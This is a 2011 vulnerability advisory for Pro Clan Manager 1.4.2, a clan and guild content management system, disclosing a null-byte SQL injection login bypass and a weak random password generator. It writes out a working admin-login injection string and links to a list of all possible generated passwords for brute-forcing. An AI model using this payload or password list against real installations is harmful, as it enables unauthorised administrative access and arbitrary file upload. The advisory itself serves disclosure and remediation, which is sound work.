Pro Clan Manager, Multiple Vulnerabilities

===============
Document Details
===============
Version 1.0, 2011-11-19

===============
Background
===============

"The aim of Pro Clan Manager is to create an international content
management system dedicated to helping Clans or Guilds work together
and have a good looking website that is W3C valid." [1]

Both of the listed issues can allow unauthenticated users with zero
knowledge to gain administrative access to the application. This
includes permissions to upload arbitrary files such as PHP scripts.

===============
Versions
===============

Version 1.4.2 was tested, the author has decided to officially
discontinue the project in response to these issues. Users should
uninstall the software as soon as possible, before finding a
replacement.

===============
Finding 1 - SQL Injection
===============

Description

The application performs input validation using the $post->Text method
throughout the application on strings to be used in dynamic query
construction. These fields do not appear to be vulnerable to SQL
Injection.

However the $post->LoginFilter uses eregi to ensure non-alphanumeric
characters are not present in the login field. eregi expects a c-style
null terminated string, and will not proceed beyond the first null
byte it encounters. By prefixing a SQL injection attack string with a
null byte this filtering can be bypassed.

The following attack string can be used in the login field to access
the system as the administrator.

notarealuser%00'+union+select+1;#

This needs to be enter as raw HTTP.

===============
Finding 2 - Poor Random Password Generation
===============

Description

Line 302 in includes/user.php generates passwords for new users and
users which have their passwords reset by an administrator.

$password = substr(md5(rand(10000,99999)), 5, 8);

While the passwords generated by this code appear random, it's fairly
obvious from the snippet above that this code is only capable of
generating a maximum of 90,000 unique passwords.

A list of these passwords can be easily constructed, which when used
during an automated attack took around 15 minutes on average to
successfully guess a random password.

A complete list of passwords can be obtained from the following URL,
http://dmcdonald.net/pcm-passgen.php.

===============
References
===============

[1] Pro Clan Manager Source Forge Page,
http://sourceforge.net/projects/autoweb/, Accessed 2011-11-19

===============
Links
===============
http://dmcdonald.net/?page_id=51 - The latest version of this advisory
http://dmcdonald.net/pcm-passgen.php - A script to generate a complete
list of possible random passwords
http://dmcdonald.net/pcm-passgen.txt - The source code for pcm-passgen.php
http://www.proclanmanager.com - The Pro Clan Manager website

-----
Renski
aka Darren McDonald
http://dmcdonald.net
M6LUL